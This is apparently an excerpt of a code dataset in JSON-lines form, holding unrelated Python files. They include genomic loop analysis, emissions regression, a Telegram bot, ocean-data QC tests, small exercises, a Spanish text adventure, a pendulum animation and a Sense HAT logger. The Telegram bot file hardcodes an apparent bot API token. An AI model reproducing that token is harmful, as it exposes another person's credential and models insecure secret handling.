sns.heatmap(trtConMat,\n xticklabels=False,\n yticklabels=False,\n square=True,\n ax=ax,\n cmap=cmap,\n linewidths=0.05,\n linecolor=\"gray\",\n linestyle=\"--\",\n vmin=vmin,\n vmax=vmax,\n cbar_kws={\"shrink\": 0.5})\n ax.set_title(\"%s specific loops\\nES:%.3f\" %\n (ccon, np.mean(trtConES)),\n fontsize=8)\n else:\n ax.set_title(\"No %s unique loops\" % nb)\n\n ax = axs[1][0]\n if cover > 0:\n conOverMat, conOverES = getDiffAggLoops(cd, overlappedLoops, cpu)\n sns.heatmap(conOverMat,\n xticklabels=False,\n yticklabels=False,\n square=True,\n ax=ax,\n cmap=cmap,\n linewidths=0.05,\n linecolor=\"gray\",\n linestyle=\"--\",\n vmin=vmin,\n vmax=vmax,\n cbar_kws={\"shrink\": 0.5})\n ax.set_ylabel(nb, fontsize=10)\n ax.set_title(\"ES:%.3f\" %np.mean(conOverES), fontsize=8)\n\n ax = axs[1][1]\n if ctrt > 0:\n conTrtMat, conTrtES = getDiffAggLoops(cd, trtLoops, cpu)\n sns.heatmap(conTrtMat,\n xticklabels=False,\n yticklabels=False,\n square=True,\n ax=ax,\n cmap=cmap,\n linewidths=0.05,\n linecolor=\"gray\",\n linestyle=\"--\",\n vmin=vmin,\n vmax=vmax,\n cbar_kws={\"shrink\": 0.5})\n ax.set_title(\"ES:%.3f\" %np.mean(conTrtES),fontsize=8)\n\n ax = axs[1][2]\n if ccon > 0:\n conConMat, conConES = getDiffAggLoops(cd, conLoops, cpu)\n sns.heatmap(conConMat,\n xticklabels=False,\n yticklabels=False,\n square=True,\n ax=ax,\n cmap=cmap,\n linewidths=0.05,\n linecolor=\"gray\",\n linestyle=\"--\",\n vmin=vmin,\n vmax=vmax,\n cbar_kws={\"shrink\": 0.5})\n ax.set_title(\"ES:%.3f\" % np.mean(conConES), fontsize=8)\n\n pylab.tight_layout()\n pylab.savefig(output + \"_diffAggLoops.pdf\")\n\n\ndef callDiffLoops(\n tl,\n cl,\n td,\n cd,\n output,\n cut=0,\n mcut=-1,\n cpu=1,\n pcut=1e-2,\n igp=False,\n noPCorr=False,\n fdrcut=0.05,\n juicebox=False,\n washU=False,\n 
customize=False,\n cacut=0.0,\n cmcut=0.0,\n vmin=None,\n vmax=None,\n cmap=None,\n):\n \"\"\"\n Call differentially enriched loops \n @param tl: str, file of _loops.txt for treatment sample\n @param cl: str, file of _loops.txt for control sample\n @param td: str, directory generated by cLoops2 pre for treatment sample\n @param cd: str, directory generated by cLoops2 pre for control sample \n @param output: str, prefix for output file \n @param cut: int, distance cutoff for estimation of difference significance , >=cut\n @param mcut: int, distance cutoff for estimation of difference significance, <=mcut\n @param cpu: int, number of cpus used \n @param pcut: float, p-value cutoffs after Bon correction\n @param igp: bool, whether to ignore p-value cutoff\n @param noPCorr: bool, whehter to perform Bon correction of p-values, default yes\n @param fdrcut: float, fdrcut for background to estimate Mcut and Acut\n @param customize: binary, if true, use user provided MA M cut and A cut\n @param cacut: float, if customize, used, A for MA plot\n @param cmcut: float, if customize, used, M for MA plot\n @param cmap: str, color map string option\n \"\"\"\n #data name\n if td.endswith(\"/\"):\n td = td[:-1]\n if cd.endswith(\"/\"):\n cd = cd[:-1]\n tname = td.split(\"/\")[-1]\n cname = cd.split(\"/\")[-1]\n\n #read in loops\n tloops = parseTxt2Loops(tl)\n cloops = parseTxt2Loops(cl)\n\n #process meta information\n na = td.split(\"/\")[-1] #name of sample directory\n tmetaf = td + \"/petMeta.json\"\n tmeta = json.loads(open(tmetaf).read())\n nb = cd.split(\"/\")[-1]\n cmetaf = cd + \"/petMeta.json\"\n cmeta = json.loads(open(cmetaf).read())\n\n #total PETs\n ta = tmeta[\"Unique PETs\"]\n tb = cmeta[\"Unique PETs\"]\n\n #chromosomes for testing\n keys = set(tmeta[\"data\"][\"cis\"].keys()).intersection(\n set(cmeta[\"data\"][\"cis\"].keys()))\n\n # step 1, merge the overlapped loops\n mloops = mergeLoops(tloops, na, cloops, nb)\n keys = list(keys.intersection(mloops.keys()))\n\n # step 2, quantify the loops in two conditions\n ds = Parallel(n_jobs=cpu, backend=\"multiprocessing\")(delayed(quantDloops)(\n key,\n mloops[key],\n tmeta[\"data\"][\"cis\"][key][\"ixy\"],\n cmeta[\"data\"][\"cis\"][key][\"ixy\"],\n cut=cut,\n mcut=mcut,\n ) for key in keys)\n ts, cs = [], []\n dloops = {}\n for d in ds:\n if d is None:\n continue\n ts.extend(d[1])\n cs.extend(d[2])\n dloops[d[0]] = d[3]\n\n # step 3, estimate the fitting parameters, cutoffs based on MANorm\n sf, acut, mcut = getBgNorm(cs, ts, output, fdrcut=fdrcut)\n # check whether to use customized cutoffs\n if customize:\n acut = cacut \n mcut = cmcut\n\n # step 4, estimate the difference significance\n ds = Parallel(n_jobs=cpu,\n backend=\"multiprocessing\")(delayed(estLoopDiffSig)(\n key,\n sf,\n ta,\n tb,\n dloops[key],\n ) for key in keys)\n dloops = []\n cs, ts, ts2 = [], [], []\n for d in ds:\n if d is None:\n continue\n dloops.extend(d[0])\n cs.extend(d[1])\n ts.extend(d[2])\n ts2.extend(d[3])\n\n #step 5, p-values Bonferroni correction and determine whether significant\n dloops = markDiffSig(dloops, acut, mcut, pcut=pcut,igp=igp,noPCorr=noPCorr)\n sigIndex = [i for i, loop in enumerate(dloops) if loop.significant > 0]\n\n # step 6, write the result\n dloops2txt(dloops, output + \"_dloops.txt\")\n\n # step 7, write the result as washU or juicebox\n tloops = [\n dloop for dloop in dloops\n if dloop.significant > 0 and dloop.scaled_fc > 0\n ]\n cloops = [\n dloop for dloop in dloops\n if dloop.significant > 0 and dloop.scaled_fc < 0\n ]\n dloops2txt( 
tloops, output + \"_\" + tname +\"_specific_dloops.txt\")\n dloops2txt( cloops, output + \"_\" + cname +\"_specific_dloops.txt\")\n comloops = [dloop for dloop in dloops if dloop.significant <1]\n if juicebox:\n dloops2juiceTxt(tloops, output + \"_\" + tname + \"_loops_juicebox.txt\")\n dloops2juiceTxt(cloops, output + \"_\" + cname + \"_loops_juicebox.txt\")\n dloops2juiceTxt(comloops, output + \"_common_loops_juicebox.txt\",significant=0)\n if washU:\n loops2washuTxt(tloops, output + \"_\" + tname + \"_loops_legacyWashU.txt\")\n loops2washuTxt(cloops, output + \"_\" + cname + \"_loops_legacyWashU.txt\")\n loops2washuTxt(comloops, output + \"_common_loops_legacyWashU.txt\",significant=0)\n dloops2NewWashuTxt(tloops,\n output + \"_\" + tname + \"_loops_newWashU.txt\")\n dloops2NewWashuTxt(cloops,\n output + \"_\" + cname + \"_loops_newWashU.txt\")\n dloops2NewWashuTxt(comloops, output + \"_common_loops_newWashU.txt\",significant=0)\n\n # step 8, show plot\n #ma plot\n plotDiffLoopsMA(sigIndex, cs, ts, ts2, tname, cname, mcut, acut, output)\n #volcano plot\n plotDiffLoopsVolcano(output + \"_dloops.txt\",\n output,\n tname,\n cname,\n fccut=mcut,\n pcut=pcut)\n #plot aggregated differential loops\n plotDiffAggLoops(dloops, output, tl, cl, td, cd, cpu=cpu, norm=True,vmin=vmin,vmax=vmax,cmap=cmap)\n\n","sub_path":"build/lib/cLoops2/callDiffLoops.py","file_name":"callDiffLoops.py","file_ext":"py","file_size_in_byte":29700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"439288931","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd \nimport numpy as np \nimport numpy.linalg as lalg\nimport matplotlib.pyplot as plt \nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nimport tensorflow.keras.regularizers as rg\nfrom sklearn.model_selection import KFold\nfrom Models import *\n\n\n# In[2]:\n\n\nemissions = pd.read_csv(\"../data/emissions.csv\")\nemissions.fillna(emissions.mean())\nx = emissions[emissions.columns[1:11]].to_numpy()\nox = np.insert(x, 10, 1.0, axis = 1)\ny = emissions[emissions.columns[0]].to_numpy()\n\n\n# In[ ]:\n\n\nauto_perceptron = Perceptron(ox, y, 0.1, build_fn = Perceptron.build_model)\nforward_pcp = auto_perceptron.forward_selection(5000)\nbackward_pcp = auto_perceptron.backward_elimination(5000)\nstep_pcp = auto_perceptron.stepwise_regression(5000)\n\n\n# In[ ]:\n\n\nauto_3L = NeuralNet3L(ox, y, build_fn = NeuralNet3L.build_model)\nforward_3L = auto_3L.forward_selection()\nbackward_3L = auto_3L.backward_elimination()\nstep_3L = auto_3L.stepwise_regression()\n\n\n# In[ ]:\n\n\nauto_4L = NeuralNet4L(ox, y, build_fn = NeuralNet4L.build_model)\nforward_4L = auto_4L.forward_selection()\nbackward_4L = auto_4L.backward_elimination()\nstep_4L = auto_4L.stepwise_regression()\n\n\n# In[ ]:\n\n\nridge_perceptron = keras.Sequential()\nridge_perceptron.add(layers.Dense(1, input_dim = 11, \n kernel_initializer = \"uniform\", \n activation = \"relu\", \n use_bias = False,\n kernel_regularizer = rg.l2(0.01)))\n\noptimizer = keras.optimizers.Adam(learning_rate = 0.0005)\nridge_perceptron.compile(loss = \"mean_squared_error\", optimizer = optimizer)\n\n\n# In[ ]:\n\n\nridge_perceptron.fit(ox, y, epochs = 50, batch_size = 10, verbose = 0)\nrsq = metrics.rsq(ridge_perceptron, ox, y)\nrsq_cv = metrics.rsq_cv(ridge_perceptron, ox, y, epochs = 50)\nprint(f\"Rsq = {rsq} Rsq_cv = {rsq_cv}\")\n\n\n# In[ ]:\n\n\ndef plot_and_save(arrays, name, basepath = 
\"../plots/python/\"): \n rsq, rsq_a, rsq_cv, aic = arrays\n x = [_ for _ in range(len(rsq))]\n plt.style.use(\"fivethirtyeight\")\n plt.rcParams[\"figure.figsize\"] = [10,10]\n plt.plot(x, np.array([rsq, rsq_a, rsq_cv]).transpose())\n plt.xlabel(\"Number of variables\")\n plt.ylabel(\"Rsq Value\")\n plt.legend([\"Rsq\", \"RsqAdj\", \"RsqCV\"])\n plt.savefig(basepath+name)\n plt.show()\n \n plt.style.use(\"fivethirtyeight\")\n plt.plot(x, aic)\n plt.xlabel(\"Number of Variables\")\n plt.ylabel(\"AIC\")\n plt.savefig(basepath+\"AIC\"+name)\n plt.show()\n \nplot_and_save(forward_pcp, \"AutoForwardPCP.png\")\nplot_and_save(backward_pcp, \"BackWardPCP.png\")\nplot_and_save(step_pcp, \"StepwisePCP.png\")\n\nplot_and_save(forward_3L, \"AutoForward3L.png\")\nplot_and_save(backward_3L, \"BackWard3L.png\")\nplot_and_save(step_3L, \"Stepwise3L.png\")\n\nplot_and_save(forward_4L, \"AutoForward4L.png\")\nplot_and_save(backward_4L, \"BackWard4L.png\")\nplot_and_save(step_4L, \"Stepwise4L.png\")\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"python/GasEmissions.py","file_name":"GasEmissions.py","file_ext":"py","file_size_in_byte":3001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"102962270","text":"class star( int ):\n\tdef __init__(self, fff=0):\n\t\tself.left = 0\n\t\tself.rigth = 0\n\t\tself.level = 0\n\tdef addch(self, dobav1):\n\t\t\tif self.left == 0: a.left = dobav1\n\t\t\telse: a.rigth = dobav1\n\t#def delch(self, kill):\t\n\t\t#self.caption(a, b)\n\t\t#a.self( delety(a,b))\na=star(3)\n#print(a)\t\t\t\na.addch(4)\na.addch(5)\nprint(a.left)\nprint(a.rigth)\n#a.delch(4, 1)\n\n#print(a.rigth)\n","sub_path":"Tree.py","file_name":"Tree.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"505932811","text":"import sys\nfrom io import BytesIO\n\nimport telegram\nfrom flask import Flask, request, send_file\n\nfrom fsm import TocMachine\n\n\nAPI_TOKEN = '513813287:AAHeRZsswSWMqoK6DwEVS4aa9Cn6bcWAfnI'\nWEBHOOK_URL = 'https://cdc9dd7a.ngrok.io/hook'\n\napp = Flask(__name__)\nbot = telegram.Bot(token=API_TOKEN)\nmachine = TocMachine(\n states=[\n 'init',\n 'hello',\n 'name',\n 'reply_name',\n 'recommend',\n 'sport',\n 'movie',\n 'news',\n 'exit'\n ],\n transitions=[\n {\n 'trigger': 'advance',\n 'source': 'init',\n 'dest': 'hello',\n 'conditions': 'say_hi'\n },\n {\n 'trigger': 'advance',\n 'source': 'init',\n 'dest': 'name',\n 'conditions': 'say_name'\n },\n {\n 'trigger': 'advance',\n 'source': 'name',\n 'dest': 'reply_name',\n 'conditions':'reply'\n },\n {\n 'trigger':'advance',\n 'source':'init',\n 'dest':'recommend',\n 'conditions':'choice'\n },\n {\n 'trigger':'advance',\n 'source':'recommend',\n 'dest':'sport',\n 'conditions':'go_sport'\n },\n {\n 'trigger':'advance',\n 'source':'recommend',\n 'dest':'movie',\n 'conditions':'go_movie'\n },\n {\n 'trigger':'advance',\n 'source':'recommend',\n 'dest':'news',\n 'conditions':'go_news'\n },\n {\n 'trigger':'advance',\n 'source':'recommend',\n 'dest':'exit',\n 'conditions':'go_exit'\n },\n {\n 'trigger':'go_back',\n 'source':['hello','reply_name','exit'],\n 'dest':'init'\n },\n {\n 'trigger':'go_recommend',\n 'source':['sport','movie','news'],\n 'dest':'recommend',\n }\n ],\n initial='init',\n auto_transitions=False,\n show_conditions=True,\n)\n\n\ndef _set_webhook():\n status = bot.set_webhook(WEBHOOK_URL)\n if not status:\n print('Webhook setup failed')\n sys.exit(1)\n else:\n print('Your webhook URL has been 
set to \"{}\"'.format(WEBHOOK_URL))\n\n\n@app.route('/hook', methods=['POST'])\ndef webhook_handler():\n update = telegram.Update.de_json(request.get_json(force=True), bot)\n machine.advance(update)\n return 'ok'\n\n\n@app.route('/show-fsm', methods=['GET'])\ndef show_fsm():\n byte_io = BytesIO()\n machine.graph.draw(byte_io, prog='dot', format='png')\n byte_io.seek(0)\n return send_file(byte_io, attachment_filename='fsm.png', mimetype='image/png')\n\n\nif __name__ == \"__main__\":\n _set_webhook()\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"537526396","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\" Consistency check for location at sea QC test.\n\"\"\"\n\nfrom numpy import ma\n\nfrom cotede.qctests.location_at_sea import (\n LocationAtSea,\n location_at_sea,\n get_bathymetry,\n)\nfrom data import DummyData\n\n\ndef test_bathymetry_point():\n \"\"\"Check the elevation of single locations\n \"\"\"\n coords = [[10, 30, -366], [10, -30, 5192], [15, -38, 5036], [12, 222, 4995]]\n for lat, lon, z in coords:\n etopo = get_bathymetry(lat, lon, resolution=\"5min\")\n\n assert \"bathymetry\" in etopo, \"Missing bathymetry from get_bathymetry\"\n assert ma.allclose(etopo[\"bathymetry\"], [z]), \\\n \"For ({},{}) expected {}\".format(lat, lon, z)\n\n\ndef test_bathymetry_track():\n \"\"\"Check the elevation for a track\n \"\"\"\n lat = [10, 10, 15, 12]\n lon = [30, -30, -38, 222]\n z = [-366, 5192, 5036, 4995]\n etopo = get_bathymetry(lat, lon, resolution=\"5min\")\n\n assert \"bathymetry\" in etopo, \"Missing bathymetry from get_bathymetry\"\n assert ma.allclose(etopo[\"bathymetry\"], z), \"Unexpected value\"\n\n\ndef test_bathymetry_greenwich():\n \"\"\"Check elevation that includes 0\n \"\"\"\n coords = [[0, 0, 4876], [6, 0, -76], [-10, 0, 5454]]\n for lat, lon, z in coords:\n etopo = get_bathymetry(lat, lon, resolution=\"5min\")\n assert \"bathymetry\" in etopo, \"Missing bathymetry from get_bathymetry\"\n assert ma.allclose(etopo[\"bathymetry\"], [z]), \\\n \"For ({},{}) expected {}\".format(lat, lon, z)\n\n\ndef test_attribute():\n data = DummyData()\n\n coords = [[10, -30, 1], [10, 330, 1]]\n for lat, lon, flag in coords:\n data.attrs['LATITUDE'] = lat\n data.attrs['LONGITUDE'] = lon\n assert location_at_sea(data) == flag\n\n\ndef test_attribute_inland():\n data = DummyData()\n\n coords = [[-10, -60, 3], [-10, 300, 3]]\n for lat, lon, flag in coords:\n data.attrs['LATITUDE'] = lat\n data.attrs['LONGITUDE'] = lon\n assert location_at_sea(data) == flag\n\n\ndef notready_test_data():\n data = DummyData()\n\n data.data['LATITUDE'] = 10\n data.data['LONGITUDE'] = -30\n flag = location_at_sea(data)\n assert flag == 1\n\n data.data['LATITUDE'] = 10\n data.data['LONGITUDE'] = 330\n flag = location_at_sea(data)\n assert flag == 1\n\n\ndef test_badlocation():\n data = DummyData()\n\n coords = [[91, -30, 3], [-91, -30, 3], [10, -361, 3], [10, 1000, 3]]\n for lat, lon, flag in coords:\n data.attrs['LATITUDE'] = lat\n data.attrs['LONGITUDE'] = lon\n assert location_at_sea(data) == flag\n\n\ndef test_nonelocation():\n data = DummyData()\n\n coords = [[None, 1, 0], [1, None, 0]]\n for lat, lon, flag in coords:\n data.attrs['LATITUDE'] = lat\n data.attrs['LONGITUDE'] = lon\n assert location_at_sea(data) == flag\n\n del(data.attrs['LATITUDE'])\n data.attrs['LONGITUDE'] = 1\n assert location_at_sea(data) == 0\n\n 
del(data.attrs['LONGITUDE'])\n data.attrs['LATITUDE'] = 1\n assert location_at_sea(data) == 0\n\n\ndef test_LocationAtSea_attrs():\n \"\"\"Test standard with single location\n\n Lat & Lon defined in the attrs\n\n Locking etopo resolution, since it can change the values.\n \"\"\"\n data = DummyData()\n y = LocationAtSea(data, cfg={'resolution': '5min'})\n\n assert hasattr(y, 'features')\n assert 'bathymetry' in y.features\n assert ma.allclose(y.features['bathymetry'], 5036)\n assert hasattr(y, 'flags')\n assert 'location_at_sea' in y.flags\n assert ma.allclose(y.flags['location_at_sea'], 1)\n\n\ndef test_LocationAtSea_track():\n \"\"\"Test standard with multiple locations\n\n lat & lon defined in the dataset. This would be the case for a TSG\n where each measurement is associated with a location.\n\n Locking etopo resolution, since it can change the values.\n\n Note that there is no restriction in the number of locations. In this\n example there are multiple depths but only 3 positions. It's not the\n LocationAtSea job to make sense of that. Should it match with which\n variable? It can't be done here, but should be done once the tests\n are combined.\n \"\"\"\n data = DummyData()\n data.data['LATITUDE'] = [15, 12, 8]\n data.data['LONGITUDE'] = [-38, 222, 0]\n\n y = LocationAtSea(data, cfg={'resolution': '5min'})\n\n assert hasattr(y, 'features')\n assert 'bathymetry' in y.features\n assert ma.allclose(y.features['bathymetry'], [5036, 4995, -122])\n assert hasattr(y, 'flags')\n assert 'location_at_sea' in y.flags\n assert ma.allclose(y.flags['location_at_sea'], [1, 1, 4])\n","sub_path":"tests/qctests/test_qc_location_at_sea.py","file_name":"test_qc_location_at_sea.py","file_ext":"py","file_size_in_byte":4597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"310948994","text":"\"\"\" CircularPrime \"\"\"\ndef prime(num):\n \"\"\" num is prime or not \"\"\"\n for i in range(2, int(num**0.5)+1):\n if num%i == 0:\n return False\n return True if num != 1 else False\n\n\ndef circular(num):\n \"\"\" num is circular or not \"\"\"\n str_num = str(num)\n for i in range(len(str_num)):\n now = int(str_num[i:] + str_num[:i])\n if not prime(now):\n return 0\n return num\n\n\ndef circular_prime(num):\n \"\"\" for i=1 to num, find the sum of circular number \"\"\"\n ans = 0\n for i in range(2, num+1):\n ans += circular(i)\n print(ans)\n\n\ncircular_prime(int(input()))\n","sub_path":"PSIT0161AM/W504_CircularPrime.py","file_name":"W504_CircularPrime.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"456148272","text":"import time\r\nimport random\r\n\r\nprint(\"\\n ****************************************BIENVENIDOS AL REINO DEL DRAGÓN*************************************************************** \\n\")\r\n\r\ndef introduccion(jugador):\r\n\tprint(\"\\n \\nEn este juego, el jugador se encuentra en una tierra llena de dragones. Los dragones viven en sus cuevas y en ellas guardan sus tesoros.\")\r\n\tprint(\"Algunos dragones son buenos y compartirán su tesoro, otros dragones son codiciosos y hambrientos y se comerán a cualquiera que pise su cueva.\")\r\n\tprint(\"El jugador se encuentra frente a las dos cuevas, una con un dragón amable y otra con un dragón hambriento.\") \r\n\tprint(\"El jugador tiene que elegir a cual cueva entrar, sin saber de ante mano donde esta uno u el otro. 
\\n \\n\")\r\n\tjugador=input(\"\tIntroduce tu nombre de jugador: \")\r\n\tprint(\"\\nMuy bien {}. Bienvenido a la tierra de dragones. \\nAnte ti se encuentran dos cuevas de aspecto semejante.\\nTú OBJETIVO es sobrevivir al menos 3 veces seguidas y acumular todo el dinero posible por el camino.\\n\\nSi lo logras, ganarás.\\nDe lo contrario serás devorado por el dragón Abraham!!!\\n\".format(jugador))\r\n\treturn jugador\r\n\r\n\r\n\r\ndef CambiarCueva():\r\n cueva = \"\"\r\n while cueva != \"1\" and cueva != \"2\":\r\n print (\"A que cueva quieres entrar? 1 o 2?\")\r\n cueva =input() \r\n \r\n return cueva\r\n\r\n\r\ndef cheqcueva(CambiarCueva,vivo,dinero):\r\n print (\"\\n\\nTe acercas a la Cueva...\")\r\n time.sleep(2)\r\n print (\"Esta oscuro y huele mal...\")\r\n time.sleep(2)\r\n print (\"Un gran dragon aparece frente a ti...\")\r\n print(\"Abre su boca y...\")\r\n time.sleep(2)\r\n print (\"\")\r\n \r\n eleccionesvitales = random.randint (1, 2)\r\n \r\n if CambiarCueva == str(eleccionesvitales):\r\n print (\"\\nTe entrega el tesoro...\")\r\n \r\n time.sleep(2)\r\n \r\n ganancia=random.randint (500, 2000)\r\n dinero=dinero+ganancia\r\n print(\"El dragón comparte su tesoro contigo.... \\nTienes {} $ ahora mismo\\n\".format(dinero))\r\n time.sleep(2)\r\n print(\"Has sobrevivido a esta ronda.\\n\\nContinuemos.\\n\")\r\n time.sleep(2)\r\n vivo+=1\r\n \r\n return vivo,dinero\r\n\r\n\r\n \r\n else:\r\n print (\"\\nEl dragón te arranca la cabeza de un mordisco....\")\r\n vivo=5\r\n print(\"Vaya,estabas cerca....\\n\")\r\n print(\"\\nFIN DEL JUEGO. Pringado!!!\\n\")\r\n return vivo,dinero\r\n \r\n#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ \r\n \r\nnom= \"\"\r\nvivo=0\r\nresult=0\r\ndinero=0\r\ndiner=0\r\nintroduccion(nom)\r\n\r\nwhile result < 3:\r\n\r\n\tNumCaverna = CambiarCueva()\r\n\tresult,diner=cheqcueva(NumCaverna,vivo,dinero)\r\n\tvivo=result\r\n\tdinero=diner\r\n\r\n \r\nif result ==3:\r\n\tprint(\"\\n\\nHAS GANADO EL JUEGO!!!!\\nY HAS ACUMULADO {} $\\n \".format(dinero)) ","sub_path":"REDES RECURRENTES/REDES LSTM/dragon.py","file_name":"dragon.py","file_ext":"py","file_size_in_byte":2854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"399083766","text":"from Ponomarenko_pmi25.programming.programming_6.meetings import Meetings\nfrom Ponomarenko_pmi25.programming.programming_6.validation import *\nfrom Ponomarenko_pmi25.programming.programming_6.memento import Creator, Caretaker\n\n\ndef copy_of_meetings(ls):\n ls1 = Meetings()\n for i in ls.meetings:\n ls1.add_to_list(i)\n return ls1\n\n\ndef memento(ls1: Meetings, originator: Creator, caretaker: Caretaker):\n originator.change(ls1)\n caretaker.filling_stack()\n ls = originator.get_condition_o()\n return ls\n\n\nls = Meetings()\nfile_name = validate_file_input()\nls.fill_list_from_file(file_name)\noriginator = Creator(ls)\ncaretaker = Caretaker(originator)\ncaretaker.filling_stack()\nwhile True:\n number_op = input('''Input number of option:\n 1. Search meetings with value\n 2. Sort by parametr\n 3. Delete meeting by ID\n 4. Add meeting\n 5. Edit meeting by ID\n 6. See all meetings\n 7. Undo\n 8. Redo\n 9. 
Exit''' + '\\n')\n if number_op == '1':\n val = input('Input value for meeting: ')\n ls.search_in_list(val)\n elif number_op == '2':\n print('''Parametrs to sort: id, date, start_time, end_time, meeting_url, owner, participant''')\n param = input('Input parametr for sorting: ')\n if param in ['id', 'date', 'start_time', 'end_time', 'owner', 'meeting_url', 'participant']:\n ls1 = copy_of_meetings(ls)\n ls1.sort(param)\n ls = memento(ls1, originator, caretaker)\n else:\n print('Wrong parametr')\n elif number_op == '3':\n id = input('Input id: ')\n if id.isdigit() is True:\n ls1 = copy_of_meetings(ls)\n ls1.remove(file_name, id)\n ls = memento(ls1, originator, caretaker)\n else:\n print(\"Wrong id\")\n elif number_op == '4':\n new_meeting = input('Input info for new meeting: ')\n if type(new_meeting) == str:\n ls1 = copy_of_meetings(ls)\n ls1.add(new_meeting, file_name)\n ls = memento(ls1, originator, caretaker)\n elif number_op == '5':\n id = input('Input id: ')\n new_meeting = input('Input info for new meeting: ')\n if type(new_meeting) == str:\n ls1 = copy_of_meetings(ls)\n ls1.edit(new_meeting, file_name, id)\n ls = memento(ls1, originator, caretaker)\n elif number_op == '6':\n if type(ls) == 'NoneType':\n print('Your list_meetings is empty!')\n else:\n ls.print_list()\n elif number_op == '7':\n caretaker.undo_redo('undo')\n ls = originator.get_condition_o()\n ls.rewrite_file(file_name)\n elif number_op == '8':\n caretaker.undo_redo('redo')\n ls = originator.get_condition_o()\n ls.rewrite_file(file_name)\n elif number_op == '9':\n break\n else:\n print('Wrong number of choice')","sub_path":"programming/programming_6/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"250433581","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\nclass PendulumAnimation(object):\n def __init__(self, theta=0., time=0., u=0., rod_length=1.):\n self.l = rod_length\n self.fig = plt.figure(figsize=(7., 7.))\n self.ax = self.fig.add_subplot(1, 1, 1)\n d = self.l + 0.25\n self.ax.set_xlim(-d, d)\n self.ax.set_ylim(-d, d)\n x, y, dx, dy, orientation, size = self.update_marker(theta, u)\n self.arrow = self.ax.plot([x, x + dx], [y, y + dy], 'r', marker=(3, 0, orientation), markersize=size)\n self.pendulum = self.ax.plot([0, x], [0, y], 'ko-', lw=2, markersize=18)\n self.time = self.ax.text(-d + 0.05, d - 0.1, f't = {time:.2f} s')\n self.theta = self.ax.text(-d + 0.05, d - 0.175, f'th = {theta * 180 / np.pi:.2f} degrees')\n self.u = self.ax.text(-d + 0.05, d - 0.25, f'u = {u:.2f} N')\n\n def close(self):\n plt.close()\n plt.ioff()\n\n def update_marker(self, theta, u):\n x = -self.l * np.sin(theta)\n y = self.l * np.cos(theta)\n dx = -.1 * u * np.cos(theta)\n dy = -.1 * u * np.sin(theta)\n orientation = theta * 180 / np.pi + np.sign(u) * 90\n size = 10. 
* np.absolute(u)\n return x, y, dx, dy, orientation, size\n\n def update(self, theta, time, u):\n self.time.set_text(f't = {time:.2f} s')\n self.theta.set_text(f'th = {theta * 180 / np.pi:.2f} degrees')\n self.u.set_text(f'u = {u:.2f} N')\n x, y, dx, dy, orientation, size = self.update_marker(theta, u)\n self.arrow[0].set_data([x, x + dx], [y, y + dy])\n self.arrow[0].set_marker((3, 0, orientation))\n self.arrow[0].set_markersize(size)\n self.pendulum[0].set_data([0, x], [0, y])\n self.fig.canvas.draw()\n\n","sub_path":"papers/ICML20/envs/animation.py","file_name":"animation.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"180170701","text":"#!/usr/bin/env python\n#-*-coding:utf-8-*-\n#This program creates graphs with data obtained by the Sense HAT.\n#Created by Iker García.\n\nimport csv\nimport matplotlib\nmatplotlib.use(\"Agg\") #Added to plot graphs without running X server.\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sense_hat import SenseHat\nimport time \n\nwhile True:\n try:\n sense = SenseHat()\n temp = sense.get_temperature() #Reads temperature from Sense HAT.\n hum = sense.get_humidity() #Reads humidity from Sense HAT.\n\n file = open(\"/var/www/dashboard/linetemp.csv\", \"a\") #Opens file to save data.\n writer = csv.writer(file, delimiter = \",\")\n readfile = open(\"/var/www/dashboard/linetemp.csv\", \"r\") #Opens file to count rows.\n reader = csv.reader(readfile, delimiter = \",\")\n log = list(reader)\n rows = len(log) \n measure = 60*rows #Data is going to be added each 60 minutes, we want to reflect this in the data file.\n data = [measure,temp]\n data = [int(i) for i in data] #Transforms data list in int, in order to be read by Matplotlib.\n writer.writerow(data) #Writes data on the csv file.\n\n file2 = open(\"/var/www/dashboard/linehum.csv\", \"a\") #Same as previous part, in this case with humidity.\n writer2 = csv.writer(file2, delimiter = \",\")\n readfile2 = open(\"/var/www/dashboard/linehum.csv\", \"r\")\n reader2 = csv.reader(readfile2, delimiter = \",\")\n log2 = list(reader2)\n rows2 = len(log2)\n measure2 = 60*rows2\n data2 = [measure2, hum]\n data2 = [int(i) for i in data2]\n writer2.writerow(data2)\n\n if rows >= 1 & rows2 >= 1: #Graph can't be plotted with only one data point, so for the first data point (rows = 0), matplotlib is not executed.\n x,y=np.loadtxt(\"/var/www/dashboard/linetemp.csv\", unpack = True, delimiter = \",\") #Opens first data set.\n plt.plot(x,y, label = u\"Temperature (\\u00B0C)\") #Plots first data set.\n x,y2=np.loadtxt(\"/var/www/dashboard/linehum.csv\", unpack = True, delimiter = \",\") #Opens second data set.\n plt.plot(x,y2, label = \"Humidity (%)\") #Plots second data set.\n plt.legend(loc = \"best\") #Plots legend at the best location.\n plt.xlabel(\"Time(min)\") #x axis label.\n plt.savefig(\"/var/www/dashboard/images/lines.png\") #Saves created 